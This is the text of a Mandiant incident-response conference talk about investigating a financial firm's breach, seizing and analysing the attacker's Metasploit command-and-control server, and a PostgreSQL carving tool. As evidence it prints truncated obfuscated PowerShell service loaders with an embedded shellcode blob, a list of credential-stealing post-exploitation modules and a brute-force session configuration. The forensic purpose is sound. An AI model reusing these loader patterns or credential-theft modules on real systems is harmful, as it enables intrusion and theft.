Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

1© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
Honey, I Stole Your C2 Server
A Dive Into Attacker Infrastructure

2© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL
About Me
• Senior Consultant – Mandiant, a
FireEye Company
• Focus on incident response
• Email: andrew.rector@mandiant.com
• Twitter: @andy_rektor

Agenda
 Summary of an enterprise
investigation
 Analysis of a Command and Control
(C2) server
 PostGrok: A post-mortem Python
project

SUMMARY OF THE ATTACK

A Typical Mandiant Investigation
 Client calls
 Deploy technology
 Find evil, solve crime
 Eradicate the attacker
 Post-remediation monitoring
 Sayonara

This Investigation
 Standard beginning to any
investigation…
- Fortune 500 financial client
contacts Mandiant
- September 2016
- Identified “strange” service
installations…

Investigation Details
7045 | Information | A service was installed in
the system. Service Name: NlCDHxYwMDHIOjtS
Service File Name: %COMSPEC% /C start %COMSPEC%
/C powershell.exe -NoE -NoP -NonI -
ExecutionPolicy Bypass -C "sal a New-Object;iex(a
IO.StreamReader((a
IO.Compression.DeflateStream([IO.MemoryStream][Co
nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W
SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl
eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)

7045 | Information | A service was installed in
the system. Service Name: NlCDHxYwMDHIOjtS
Service File Name: %COMSPEC% /C start %COMSPEC%
/C powershell.exe -NoE -NoP -NonI -
ExecutionPolicy Bypass -C "sal a New-Object;iex(a
IO.StreamReader((a
IO.Compression.DeflateStream([IO.MemoryStream][Co
nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W
SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl
eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)

• Intelligence-led scoping
• Metasploit based indicators
• Non-standard workstation
names
• Service installations
containing:
• %comspec%
• PowerShell
• Base64 encoding
4624 | Audit Success | An
account was successfully
logged on. <data> -
Network Information:
Workstation Name:
QmMhuLYFzfNVblK2 Source
Network Address:
10.10.10.10 Source Port:
3283 Detailed
Authentication Information:
Logon Process: NtLmSsp
Authentication Package:
NTLM Transited Services: -
Package Name (NTLM only):
NTLM V2 Key Length: 0

Investigation Summary
 72 long hours later…
- 129 systems Identified
- 116 compromised accounts
- Initial attack vector identified

ANALYSIS OF A C2 SERVER

Two-sided Perspective
 The responder’s perspective
- Incident response investigation
 The attacker’s perspective
- Command and Control (C2) server

Back to That Service Installation
7045 | Information | A service was installed in the
system. Service Name: NlCDHxYwMDHIOjtS Service
File Name: %COMSPEC% /C start %COMSPEC% /C
powershell.exe -NoE -NoP -NonI -ExecutionPolicy
Bypass -C "sal a New-Object;iex(a
IO.StreamReader((a
IO.Compression.DeflateStream([IO.MemoryStream][Conv
ert]::FromBase64String(“SSByZ…==”);IEX (New-Object
IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.Compre
ssionMode]::Decompress))).ReadToEnd();…

Decoding Obfuscated Code
 Identify base64 encoded data
 Identify compression scheme

7045 | Information | A service was installed in the
system. Service Name: NlCDHxYwMDHIOjtS Service
File Name: %COMSPEC% /C start %COMSPEC% /C
powershell.exe -NoE -NoP -NonI -ExecutionPolicy
Bypass -C "sal a New-Object;iex(a
IO.StreamReader((a
IO.Compression.DeflateStream([IO.MemoryStream][Conv
ert]::FromBase64String(“SSByZ…==”);IEX (New-Object
IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.Compre
ssionMode]::Decompress))).ReadToEnd();…

 Decode base64 encoded layer 2 function
function pwej6xjR {
Param ($oID, $fP4L8tiY5H)
$d9V = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-
Object { $_.GlobalAssemblyCache -And $_.Location.Split('')[-
1].Equals('System.dll')
}).GetType('Microsoft.Win32.UnsafeNativeMethods’)
<snipped>
[Byte[]]$uGTfyXcU4 =
[System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItS
YEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxI
AdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI…==")

 Disassemble shellcode
 Identify network calls
 Convert network byte
order to ascii

Provide Decoded IP to Client
 Provide decoded IP to client
C2 IP Address

A Familiar IP
 Client recognizes IP owner
 Described as a “small time competitor”

Client Asks For C2 Server

Client Receives Entire Server

Mandiant Images Server

Forensic Analysis
 Windows Server 2008
- Attacker created their own user account
- Privilege escalation and credential harvesting
- Best of all…
• Downloaded VMWare Workstation
• Downloaded Kali Linux ISO
• Installed Kali VM – July 2016
• Two months before attack starts

Forensic Analysis
 Investigation inception
- Focus on Kali
- Export VM
- Rinse, wash, repeat

Forensic Analysis
 Kali VM
- Valuable secure logs
- Meterpreter configuration file
- SQLMap – Detecting and
exploiting SQL flaws
- BeEF – The Browser Exploitation
Framework
- Revealing keyword searches
- PostgreSQL history contained
some interesting data
createuser msf -P -S -R -D
createdb -O msf msf
exit
dropdb msf
dropuser msf
dropdb ms_test
dropuser msf
createdb -O msf msf
exit
dropdb
dropdb msf
createdb msf
exit

Metasploit and PostgreSQL
 PostgreSQL command history tells a story
 PostgreSQL is messy
- /var/lib/postgresql/<version>/main/base
- Collection of binary files
- Publicly available parser doesn’t exist

Boot Up
 It’s a VM… what if we just boot up the VM and access
the DB directly?
- Password protected
- Single User Mode
- Change PW
- Profit

I AM THE ATTACKER
Got
System
Impersonate
Attacker

Metasploit… For IR?
 Leverage PostgreSQL history to
obtain critical DB info
 Leverage MSFConsole to interact
with PostgreSQL DB
createdb -O msf msf
exit
dropdb msf
dropuser msf
dropdb ms_test
dropuser msf
createdb -O msf msf
exit
dropdb
dropdb msf
createdb msf
exit

Metasploit DB Commands
Command Function
Creds List all credentials in the database
Hosts List all hosts in the database
Loot Information gained from post-exploitation modules
Notes Information from reconnaissance and network enumeration
Services Services running on identified hosts
Vulns Vulnerabilities identified, and exploitation status

PostgreSQL Shenanigans
 Good… but not great
- Not everything had timestamps
- Wanted even more detail
 Directly accessing the DB and bypassing Metasploit is
the better way to go
- DB via psql – psql –U msf –h localhost
- And…

SO MANY TABLES!

Metasploit Credential Publics

Metasploit Credential Realms

Sessions

Sessions Decoded
..{$".WORKSPACEI"..:.EF".VERBOSEI" true.;.F"
USERNAME".Ultra<REDACTED>"
PASSWORD".<REDACTED>".USER_FILEI"..;.F".PASS_FILEI"..;.F".USERPASS_FILEI"..;.F".B
RUTEFORCE_SPEEDI".5.;.F".BLANK_PASSWORDSI"
false.;.F".USER_AS_PASSI"
false.;.F".DB_ALL_CREDSI"
false.;.F".DB_ALL_USERSI"
false.;.F".DB_ALL_PASSI"
false.;.F".STOP_ON_SUCCESSI"
false.;.F".REMOVE_USER_FILEI"
false.;.F".REMOVE_PASS_FILEI"
false.;.F".REMOVE_USERPASS_FILEI"
false.;.F".MaxGuessesPerServiceI".0.;.F".MaxMinutesPerServiceI".0.;.F".MaxGuesses
PerUserI".0.;.F".InitialAutoRunScript".".AutoRunScript".".RHOSTS".<company.domain
.com>".THREADSI".50.;.F".ShowProgressI"
true.;.F".ShowProgressPercentI".10.;.FI"
RPORT.;.FI".22.;.FI".Proxies.;.FI"..;.F".SSH_DEBUGI"
false.;.F".SSH_TIMEOUTI".30.;.F"
RHOSTI".<Remote IP Address>.;.F

Case Solved
 A complete timeline
 A perspective from two sides:
- The investigator
- The attacker!
 Happy client, happy consultant

POSTGROK: A POST-MORTEM
PYTHON PROJECT

Identifying Additional Victims
 BUT WAIT…
- Attacker had access to C2 server since July 2016
- PostgreSQL history contained evidence of prior DBs
- Is there any way to recover deleted DBs?

 At least three deleted PostgreSQL
databases
- Data verified via keyword searches
 Has anyone ever tried to recover
PostgreSQL databases?
- Research didn’t identify anything
obvious
- One project that was a work in
progress, but not as much focus on
PostgreSQL
createdb -O msf msf
exit
dropdb msf
dropuser msf
dropdb ms_test
dropuser msf
createdb -O msf msf
exit
dropdb
dropdb msf
createdb msf
exit

 Python Hobbyist
- PostgreSQL is Open Source
- Went on a journey to read C
- Created PostGrok to carve all
PostgreSQL rows from a flat binary
file (raw image)

Down the PostgreSQL Rabbit Hole

PostgreSQL Terms and Definitions
 Anatomy of a PostgreSQL DB
- Tables
- Page (page header)
- Row pointers
- Free space
- Row entry

A PostgreSQL Page
Color Meaning
Red Table Header
Blue Row Pointers
Yellow Null Space
Purple Row Data

PostgreSQL Page Header
 Table header
- 24 byte structure
- Version info
- # of rows = (pd_lower – 24)/24
Version
PD_Lower

PostgreSQL Row Pointers
 Row pointers
- Four byte structures
- Contains offset and size of row

PostgreSQL Page Free Space
 Free space
- New row pointers added from start of free space
- New row data added to the end

PostgreSQL Row
 Row entry
- 24 byte header
- Row data
Row Header

PostgreSQL Row Header
 Row header
- Row insertion ID
- Row deletion ID
- Number of attributes
- Offset of row data
Deletion ID
Insertion ID # of Attributes
Row data offset

Row Data
 Row data
- Integers
- Dates and times
- Variable length strings

PostGrok Capabilities
 PostGrok
- A Python tool that thoroughly understands PostgreSQL
 Capabilities:
- Carve PostgreSQL rows from a flat, binary file
- Keyword searching
- Exports to CSV or XLSX
- Officially support version 9.5

https://github.com/arector327/PostGrok

PostGrok Findings
 PostGrok helped identify:
- Full Meterpreter sessions from
campaigns occurring in:
• July 2016
• August 2016
• September 2016
- 1,428 compromised credentials
- 48 enumerated domains

Top Post-Exploitation Modules
Module Frequency Function
run post/windows/gather/credentials/sso 81 Extract SSO credentials
run post/windows/gather/enum_ad_computers 26
Enumerates systems in the default AD
directory
run post/windows/gather/enum_domains 24 Enumerates domains a host has visibility into
run post/windows/gather/smart_hashdump 14 Dumps local accounts from SAM database
run post/multi/gather/filezilla_client_cred 11 Collects credentials from FileZilla FTP client
run post/windows/gather/credentials/gpp 8 Gathers GPP XML files and extracts pw’s
run post/windows/gather/credentials/credential_collector 7 Extracts credentials from host
run post/windows/gather/credentials/outlook 4
Extracts and decrypts Outlook passwords
from the Windows Registry
run post/windows/gather/credentials/tortoisesvn 4
Extracts and decrypts saved TortoiseSVN
pw’s

Attacker Creates User Accounts
Attacker creates user account “mava2” on victim system

Attacker Uploaded Webshells
Attacker uploads “ntdaddy.php” and “cmd.php” to victim web server

Attacker Data Theft
Attacker downloads file “wifi_pass.xlsx” from victim workstation
Attacker views contents of “FileZilla.txt” and downloads “23.7.2016.xls”

Attacker Tradecraft
Attacker executes PsExec, creates reverse shell using NetCat

Attacker Tradecraft (cont.)
Attacker attempts to unzip the archive “file.zip”, is unsuccessful and
downloads DLL from another compromised web server

Summary
 Mandiant investigated an intrusion conducted by an
unknown attacker
 Obtained a C2 server, and performed forensic analysis
 Developed a tool to carve PostgreSQL rows from an
image

Takeaways
 Metasploit gets the job done
 Operational security
 Just ask

QUESTIONS?

Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure (20)

More from Shakacon

More from Shakacon (20)

Recently uploaded

Recently uploaded (20)

Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

Editor's Notes